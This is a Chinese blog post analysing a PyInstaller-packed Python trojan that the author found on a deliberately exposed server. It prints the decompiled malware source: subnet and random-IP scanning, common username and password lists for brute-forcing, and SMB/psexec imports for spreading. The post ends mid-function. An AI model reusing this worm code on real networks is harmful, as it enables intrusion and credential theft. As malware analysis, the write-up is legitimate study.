pages/2024/11/02/trojan.html

<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<title>关于Python制作的木马探索 | Mayx的博客</title>
<meta name="generator" content="Jekyll v3.9.5" />
<meta property="og:title" content="关于Python制作的木马探索" />
<meta name="author" content="mayx" />
<meta property="og:locale" content="zh_CN" />
<meta name="description" content="想不到木马病毒居然也可以用Python写😆" />
<meta property="og:description" content="想不到木马病毒居然也可以用Python写😆" />
<meta property="og:site_name" content="Mayx的博客" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-02T00:00:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="关于Python制作的木马探索" />
<meta name="google-site-verification" content="huTYdEesm8NaFymixMNqflyCp6Jfvd615j5Wq1i2PHc" />
<meta name="msvalidate.01" content="0ADFCE64B3557DC4DC5F2DC224C5FDDD" />
<meta name="yandex-verification" content="fc0e535abed800be" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"mayx"},"dateModified":"2024-11-02T00:00:00+08:00","datePublished":"2024-11-02T00:00:00+08:00","description":"想不到木马病毒居然也可以用Python写😆","headline":"关于Python制作的木马探索","mainEntityOfPage":{"@type":"WebPage","@id":"/2024/11/02/trojan.html"},"publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"https://avatars0.githubusercontent.com/u/17966333"},"name":"mayx"},"url":"/2024/11/02/trojan.html"}</script>
<!-- End Jekyll SEO tag -->

  <link rel="canonical" href="https://mabbs.github.io/2024/11/02/trojan.html" />
  <link type="application/atom+xml" rel="alternate" href="/atom.xml" title="Mayx的博客" />
  <link rel="alternate" type="application/rss+xml" title="Mayx的博客(RSS)" href="/rss.xml" />
  <link rel="alternate" type="application/json" title="Mayx的博客(JSON Feed)" href="/feed.json" />
  <link rel="stylesheet" href="/assets/css/style.css?v=1770554153" />
  <!--[if !IE]> -->
  <link rel="stylesheet" href="/Live2dHistoire/live2d/css/live2d.css" />
  <!-- <![endif]-->
  <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="Mayx的博客" />
  <link rel="webmention" href="https://webmention.io/mabbs.github.io/webmention" />
  <link rel="pingback" href="https://webmention.io/mabbs.github.io/xmlrpc" />
  <link rel="preconnect" href="https://summary.mayx.eu.org" crossorigin="anonymous" />
  <link rel="prefetch" href="https://www.blogsclub.org/badge/mabbs.github.io" as="image" />
  <link rel="blogroll" type="text/xml" href="/blogroll.opml" />
  <link rel="me" href="https://github.com/Mabbs" />
  <script src="/assets/js/jquery.min.js"></script>
  <!--[if lt IE 9]>
    <script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery-ajaxtransport-xdomainrequest/1.0.3/jquery.xdomainrequest.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/respond.js/1.4.2/respond.min.js"></script>
  <![endif]-->
  <script>
    var lastUpdated = new Date("Sun, 08 Feb 2026 20:35:53 +0800");
    var BlogAPI = "https://summary.mayx.eu.org";
  </script>
  <script src="/assets/js/main.js"></script>
  <!--[if !IE]> -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async="async" src="https://www.googletagmanager.com/gtag/js?id=UA-137710294-1"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-137710294-1');
  </script>
  
  <script src="/assets/js/instant.page.js" type="module"></script>
  <!-- <![endif]-->
</head>

<body>
  <!--[if !IE]> --><noscript><marquee style="top: -15px; position: relative;"><small>发现当前浏览器没有启用JavaScript，这不影响你的浏览，但可能会有一些功能无法使用……</small></marquee></noscript><!-- <![endif]-->
  <!--[if IE]><marquee style="top: -15px; position: relative;"><small>发现当前浏览器为Internet Explorer，这不影响你的浏览，但可能会有一些功能无法使用……</small></marquee><![endif]-->
  <div class="wrapper">
    <header class="h-card">
      <h1><a class="u-url u-uid p-name" rel="me" href="/">Mayx的博客</a></h1>

      
      <img src="https://avatars0.githubusercontent.com/u/17966333" fetchpriority="high" class="u-photo" alt="Logo" style="width: 90%; max-width: 300px; max-height: 300px;" />
      

      <p class="p-note">Mayx's Home Page</p>

      <form action="/search.html">
        <input type="text" name="keyword" id="search-input-all" placeholder="Search blog posts.." />&#160;<input type="submit" value="搜索" />
      </form>
      <br />

      

      

      <p class="view"><a class="u-url" href="/Mabbs/">About me</a></p>

      <ul class="downloads">
        
        <li style="width: 270px; border-right: none;"><a href="/MayxBlog.tgz">Download <strong>TGZ File</strong></a></li>
        
      </ul>
    </header>
    <section class="h-entry">

      <small><time class="date dt-published" datetime="2024-11-02T00:00:00+08:00">2 November 2024</time> - 字数统计：72444 - 阅读大约需要260分钟 - Hits: <span id="/2024/11/02/trojan.html" class="visitors">Loading...</span></small>
<h1 class="p-name">关于Python制作的木马探索</h1>

<p class="view">by <a class="p-author h-card" href="//github.com/Mabbs">mayx</a></p>
<div id="outdate" style="display:none;">
  <hr /><p>
  这是一篇创建于 <span id="outime"></span> 天前的文章，其中的信息可能已经有所发展或是发生改变。
  </p>
</div>
<script>
  daysold = Math.floor((new Date().getTime() - new Date("Sat, 02 Nov 2024 00:00:00 +0800").getTime()) / (24 * 60 * 60 * 1000));
  if (daysold > 90) {
    document.getElementById("outdate").style.display = "block";
    document.getElementById("outime").innerHTML = daysold;
  }
</script>

<hr />

<b>AI摘要</b>
<p id="ai-output">这篇文章介绍了一位作者使用Python制作木马的经历。起初，作者出于好奇和旧服务器即将过期，将一台Linux服务器重装为Windows Server 2008，意图让它成为一个容易被攻击的肉鸡。作者在服务器上发现了一个Python编写的木马，通过解包和反编译，得以查看源代码。木马的主要功能包括扫描特定IP范围、尝试连接以及进行一些基础的网络操作。作者分享了这个过程中的技术细节和发现。</p>

<hr />



<ul><li><a href="#起因">起因</a></li><li><a href="#提取源代码">提取源代码</a></li><li><a href="#行为分析">行为分析</a></li><li><a href="#感想">感想</a></li></ul>
<hr />


 <main class="post-content e-content" role="main"><p>想不到木马病毒居然也可以用Python写😆<!--more--></p>
<h1 id="起因">
  
  
    <a href="#起因"><svg class='octicon' viewBox='0 0 16 16' version='1.1' width='16' height='32' aria-hidden='true'><path fill-rule='evenodd' d='M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z'></path></svg></a> 起因
  
  
</h1>
    
<p>在一年前阿里云搞了个高校学生免费领300CNY券的活动，那时候我领了一张并且零元购了一个香港的2c1g轻量服务器，在这一年里它为我做了许多，不仅当延迟极低的梯子，另外还运行着H@H给我赚Hath。一年过后的现在它马上就要过期了，当时我让我的同学也领了一张，正好等到我服务器快过期的时候买，于是我创好服务器并且把我的东西都迁过去，之后旧的服务器就没什么用了。 </p><p>
  那在它剩下的最后几天让它干些什么好呢？首先Linux系统感觉没啥意思，装个Windows玩玩吧。不过香港阿里云在装了Linux系统之后是不允许切换成Windows的，而且如果买的时候装Windows还需要额外付费，所以我用了一个<a href="https://github.com/bin456789/reinstall">一键DD/重装脚本</a>把我的系统重装成Windows Server 2008。不过其实就算刷成Windows也不能改变它没啥用的事实，所以我给它设置了超简单的密码，并且没有装任何补丁，防火墙全关掉，让它在网络上成为能被随意攻破的肉鸡吧。 </p><p>
  在这之后没几天我登上去看了一眼，其实看不出来啥，毕竟就算被入侵了绝大多数情况都是被人当备用的，一般人也不会闲着把上面的文件全删掉，把系统搞崩。所以我安了个360，看看有没有中木马，结果还真中了，在Temp目录下多了个“svchost.exe”文件（虽然还有其他的木马文件但不是Python的所以不感兴趣），而且看图标居然是pyinstaller打包的！这让我有点感兴趣了，其他语言写的编译之后很难看出来什么，而且我也看不懂其他语言写的东西，但是Python我至少还是能看懂的，所以我就下载了这个样本尝试获得它的源代码。</p>
<h1 id="提取源代码">
  
  
    <a href="#提取源代码"><svg class='octicon' viewBox='0 0 16 16' version='1.1' width='16' height='32' aria-hidden='true'><path fill-rule='evenodd' d='M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z'></path></svg></a> 提取源代码
  
  
</h1>
    
<p>pyinstaller解包还是挺简单的，用<a href="https://github.com/extremecoders-re/pyinstxtractor">PyInstaller Extractor</a>就可以，首先我在我的电脑上尝试解包，不过因为Python版本不对，里面的PYZ文件不能解包，并且提示我使用Python 2.7的环境再试一次。我找了台装有Python 2.7环境的服务器又执行了一次之后就全部解包完了。想不到这个木马居然没有加密😂，直接就能解压，不过就算加密了我之前看过一篇<a href="https://www.cnblogs.com/liweis/p/15891170.html">文章</a>可以进行解密。 </p><p>
  不过现在得到的文件都是字节码pyc文件，还需要反编译才能看到源代码，这个步骤也很简单，安装个<a href="https://github.com/rocky/python-uncompyle6">uncompyle6</a>工具就可以。它的主程序名字叫“ii.py”，于是我反编译了一下，不过看起来作者还整了一些混淆，但是极其简单，就把几个函数换成一串变量而已，所以写了个简单的脚本给它还原回去了，最终处理的结果如下（里面有个<a href="https://github.com/DanMcInerney/Invoke-Cats">混淆过的PowerShell版mimikatz</a>，太长了所以我给删掉了）：</p>

<details>
  <summary>
Show Code
</summary>

  <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># uncompyle6 version 3.9.2
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Jun 24 2022, 18:01:55) 
# [GCC 8.5.0 20210514 (Red Hat 8.5.0-13)]
# Embedded file name: ii.py
</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">binascii</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">platform</span>
<span class="kn">from</span> <span class="nn">urllib2</span> <span class="kn">import</span> <span class="n">urlopen</span>
<span class="kn">from</span> <span class="nn">json</span> <span class="kn">import</span> <span class="n">load</span>
<span class="kn">from</span> <span class="nn">impacket</span> <span class="kn">import</span> <span class="n">smb</span><span class="p">,</span> <span class="n">smbconnection</span>
<span class="kn">from</span> <span class="nn">mysmb</span> <span class="kn">import</span> <span class="n">MYSMB</span>
<span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">pack</span><span class="p">,</span> <span class="n">unpack</span><span class="p">,</span> <span class="n">unpack_from</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">from</span> <span class="nn">psexec</span> <span class="kn">import</span> <span class="n">PSEXEC</span>
<span class="n">iplist</span> <span class="o">=</span> <span class="p">[</span><span class="s">'192.168.0.1/24'</span><span class="p">,</span> <span class="s">'192.168.1.1/24'</span><span class="p">,</span> <span class="s">'192.168.2.1/24'</span><span class="p">,</span> <span class="s">'192.168.3.1/24'</span><span class="p">,</span> <span class="s">'192.168.4.1/24'</span><span class="p">,</span> 
 <span class="s">'192.168.5.1/24'</span><span class="p">,</span> <span class="s">'192.168.6.1/24'</span><span class="p">,</span> <span class="s">'192.168.7.1/24'</span><span class="p">,</span> <span class="s">'192.168.8.1/24'</span><span class="p">,</span> <span class="s">'192.168.9.1/24'</span><span class="p">,</span> 
 <span class="s">'192.168.10.1/24'</span><span class="p">,</span> <span class="s">'192.168.18.1/24'</span><span class="p">,</span> <span class="s">'192.168.31.1/24'</span><span class="p">,</span> <span class="s">'192.168.199.1/24'</span><span class="p">,</span> 
 <span class="s">'192.168.254.1/24'</span><span class="p">,</span> <span class="s">'192.168.67.1/24'</span><span class="p">,</span> <span class="s">'10.0.0.1/24'</span><span class="p">,</span> <span class="s">'10.0.1.1/24'</span><span class="p">,</span> <span class="s">'10.0.2.1/24'</span><span class="p">,</span> 
 <span class="s">'10.1.1.1/24'</span><span class="p">,</span> <span class="s">'10.90.90.1/24'</span><span class="p">,</span> <span class="s">'10.1.10.1/24'</span><span class="p">,</span> <span class="s">'10.10.1.1/24'</span><span class="p">]</span>
<span class="n">userlist</span> <span class="o">=</span> <span class="p">[</span><span class="s">''</span><span class="p">,</span> <span class="s">'Administrator'</span><span class="p">,</span> <span class="s">'user'</span><span class="p">,</span> <span class="s">'admin'</span><span class="p">,</span> <span class="s">'test'</span><span class="p">,</span> <span class="s">'hp'</span><span class="p">,</span> <span class="s">'guest'</span><span class="p">]</span>
<span class="n">userlist2</span> <span class="o">=</span> <span class="p">[</span><span class="s">''</span><span class="p">,</span> <span class="s">'Administrator'</span><span class="p">,</span> <span class="s">'admin'</span><span class="p">]</span>
<span class="n">passlist</span> <span class="o">=</span> <span class="p">[</span><span class="s">''</span><span class="p">,</span> <span class="s">'123456'</span><span class="p">,</span> <span class="s">'password'</span><span class="p">,</span> <span class="s">'qwerty'</span><span class="p">,</span> <span class="s">'12345678'</span><span class="p">,</span> <span class="s">'123456789'</span><span class="p">,</span> <span class="s">'123'</span><span class="p">,</span> <span class="s">'1234'</span><span class="p">,</span> 
 <span class="s">'123123'</span><span class="p">,</span> <span class="s">'12345'</span><span class="p">,</span> <span class="s">'12345678'</span><span class="p">,</span> <span class="s">'123123123'</span><span class="p">,</span> <span class="s">'1234567890'</span><span class="p">,</span> <span class="s">'88888888'</span><span class="p">,</span> <span class="s">'111111111'</span><span class="p">,</span> 
 <span class="s">'000000'</span><span class="p">,</span> <span class="s">'111111'</span><span class="p">,</span> <span class="s">'112233'</span><span class="p">,</span> <span class="s">'123321'</span><span class="p">,</span> <span class="s">'654321'</span><span class="p">,</span> <span class="s">'666666'</span><span class="p">,</span> <span class="s">'888888'</span><span class="p">,</span> <span class="s">'a123456'</span><span class="p">,</span> 
 <span class="s">'123456a'</span><span class="p">,</span> <span class="s">'5201314'</span><span class="p">,</span> <span class="s">'1qaz2wsx'</span><span class="p">,</span> <span class="s">'1q2w3e4r'</span><span class="p">,</span> <span class="s">'qwe123'</span><span class="p">,</span> <span class="s">'123qwe'</span><span class="p">,</span> <span class="s">'a123456789'</span><span class="p">,</span> 
 <span class="s">'123456789a'</span><span class="p">,</span> <span class="s">'baseball'</span><span class="p">,</span> <span class="s">'dragon'</span><span class="p">,</span> <span class="s">'football'</span><span class="p">,</span> <span class="s">'iloveyou'</span><span class="p">,</span> <span class="s">'password'</span><span class="p">,</span> 
 <span class="s">'sunshine'</span><span class="p">,</span> <span class="s">'princess'</span><span class="p">,</span> <span class="s">'welcome'</span><span class="p">,</span> <span class="s">'abc123'</span><span class="p">,</span> <span class="s">'monkey'</span><span class="p">,</span> <span class="s">'!@#$%^&amp;*'</span><span class="p">,</span> <span class="s">'charlie'</span><span class="p">,</span> 
 <span class="s">'aa123456'</span><span class="p">,</span> <span class="s">'Aa123456'</span><span class="p">,</span> <span class="s">'admin'</span><span class="p">,</span> <span class="s">'homelesspa'</span><span class="p">,</span> <span class="s">'password1'</span><span class="p">,</span> <span class="s">'1q2w3e4r5t'</span><span class="p">,</span> 
 <span class="s">'qwertyuiop'</span><span class="p">,</span> <span class="s">'1qaz2wsx'</span><span class="p">]</span>
<span class="n">domainlist</span> <span class="o">=</span> <span class="p">[</span><span class="s">''</span><span class="p">]</span>
<span class="n">nip</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">ntlist</span> <span class="o">=</span> <span class="p">[]</span>

<span class="c1"># remove mkatz cause it is too long(https://github.com/DanMcInerney/Invoke-Cats)
</span><span class="n">mkatz</span> <span class="o">=</span> <span class="s">''</span>

<span class="k">def</span> <span class="nf">find_ip</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">iplist2</span>
    <span class="n">ipconfig_process</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'ipconfig /all'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
    <span class="n">output</span> <span class="o">=</span> <span class="n">ipconfig_process</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">'</span><span class="se">\\</span><span class="s">b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)</span><span class="se">\\</span><span class="s">.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)</span><span class="se">\\</span><span class="s">b'</span><span class="p">,</span> <span class="n">output</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">ipaddr</span> <span class="ow">in</span> <span class="n">result</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">ipaddr</span> <span class="o">!=</span> <span class="s">'127.0.0.1'</span> <span class="ow">and</span> <span class="n">ipaddr</span> <span class="o">!=</span> <span class="s">'255.255.255.0'</span> <span class="ow">and</span> <span class="n">ipaddr</span> <span class="o">!=</span> <span class="s">'0.0.0.0'</span><span class="p">:</span>
            <span class="n">ipaddr</span> <span class="o">=</span> <span class="n">ipaddr</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipaddr</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipaddr</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.1/24'</span>
            <span class="n">iplist</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">ipaddr</span><span class="p">)</span>

    <span class="n">netstat_process</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'netstat -na'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
    <span class="n">output2</span> <span class="o">=</span> <span class="n">netstat_process</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">result2</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">'</span><span class="se">\\</span><span class="s">b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)</span><span class="se">\\</span><span class="s">.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)</span><span class="se">\\</span><span class="s">b'</span><span class="p">,</span> <span class="n">output2</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">ip</span> <span class="ow">in</span> <span class="n">result2</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">ip</span> <span class="o">!=</span> <span class="s">'127.0.0.1'</span> <span class="ow">and</span> <span class="n">ip</span> <span class="o">!=</span> <span class="s">'0.0.0.0'</span> <span class="ow">and</span> <span class="n">ip</span> <span class="o">!=</span> <span class="s">'255.255.0.0'</span> <span class="ow">and</span> <span class="n">ip</span> <span class="o">!=</span> <span class="s">'1.1.1.1'</span><span class="p">:</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ip</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.1/24'</span>
            <span class="n">iplist</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>

    <span class="k">try</span><span class="p">:</span>
        <span class="n">ipp1</span> <span class="o">=</span> <span class="n">urlopen</span><span class="p">(</span><span class="s">'http://ip.42.pl/raw'</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">3</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
        <span class="n">ipp1</span> <span class="o">=</span> <span class="n">ipp1</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipp1</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipp1</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.1/24'</span>
        <span class="n">ipp2</span> <span class="o">=</span> <span class="n">load</span><span class="p">(</span><span class="n">urlopen</span><span class="p">(</span><span class="s">'http://jsonip.com'</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">3</span><span class="p">))[</span><span class="s">'ip'</span><span class="p">]</span>
        <span class="n">ipp2</span> <span class="o">=</span> <span class="n">ipp2</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipp2</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipp2</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.1/24'</span>
        <span class="n">iplist</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">ipp1</span><span class="p">)</span>
        <span class="n">iplist</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">ipp2</span><span class="p">)</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>

    <span class="n">iplist2</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">iplist</span><span class="p">))</span>
    <span class="n">iplist2</span><span class="p">.</span><span class="n">sort</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">iplist</span><span class="p">.</span><span class="n">index</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">iplist2</span>


<span class="k">def</span> <span class="nf">xip</span><span class="p">(</span><span class="n">numb</span><span class="p">):</span>
    <span class="k">del</span> <span class="n">nip</span><span class="p">[:]</span>
    <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="n">numb</span><span class="p">):</span>
        <span class="n">ipp</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&gt;I'</span><span class="p">,</span> <span class="n">random</span><span class="p">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="il">4294967295L</span><span class="p">)))</span>
        <span class="n">ipp</span> <span class="o">=</span> <span class="n">ipp</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipp</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.'</span> <span class="o">+</span> <span class="n">ipp</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">'.'</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="s">'.1/24'</span>
        <span class="n">nip</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">ipp</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">nip</span>


<span class="k">def</span> <span class="nf">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">timeout</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">timeout</span><span class="p">)</span> <span class="k">if</span> <span class="n">timeout</span> <span class="k">else</span> <span class="bp">None</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span>
        <span class="k">return</span> <span class="mi">1</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">return</span> <span class="mi">0</span>


<span class="k">def</span> <span class="nf">scan2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span>
        <span class="k">return</span> <span class="mi">1</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">return</span> <span class="mi">0</span>


<span class="k">def</span> <span class="nf">scan3</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span>
        <span class="k">return</span> <span class="mi">1</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">return</span> <span class="mi">0</span>


<span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">fr</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">dl</span>
    <span class="k">global</span> <span class="n">domainlist</span>
    <span class="k">global</span> <span class="n">ee2</span>
    <span class="k">global</span> <span class="n">passlist</span>
    <span class="k">global</span> <span class="n">userlist2</span>
    <span class="k">for</span> <span class="n">u</span> <span class="ow">in</span> <span class="n">userlist2</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">passlist</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">u</span> <span class="o">==</span> <span class="s">''</span> <span class="ow">and</span> <span class="n">p</span> <span class="o">!=</span> <span class="s">''</span><span class="p">:</span>
                <span class="k">continue</span>
